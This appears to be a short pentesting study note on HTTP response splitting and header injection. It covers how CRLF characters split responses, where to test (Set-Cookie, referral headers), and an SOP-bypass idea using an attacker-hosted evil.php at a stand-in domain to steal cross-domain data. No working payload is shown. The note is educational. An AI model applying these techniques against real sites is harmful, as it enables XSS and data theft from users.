HTTP Response Splitting
The HTTP standard uses \r\n as part of it syntax/parsing to establish where data starts and headers end. Because of this an attacker may be able to prematurely split the response header and have a single response interpreted as 2 responses effectively creating 2 response blocks. This functionality can be abused.
This is different from Header Injection attacks where we are instead adding new headers to a single response block.
Things to look for:
Application puts user input into a response header
Set-Cookie is a good value to test
Sites that pull referral domains to track your last visited site.
There may be sanitation to avoid
Example from eLearn:
This split response will make the browser load the second response into the browser. This response can contain such things as XSS and Apparent Defacement.
SOP Bypass (header injection):
Then the attacker would host an evil file at attacker.site/evil.php that will preform a JS call within the php to do a cross-domain AJAX request to steal data from the target domain.
If the response splitting is not a vulnerable vector then the cross-origin request will be blocked.
Last updated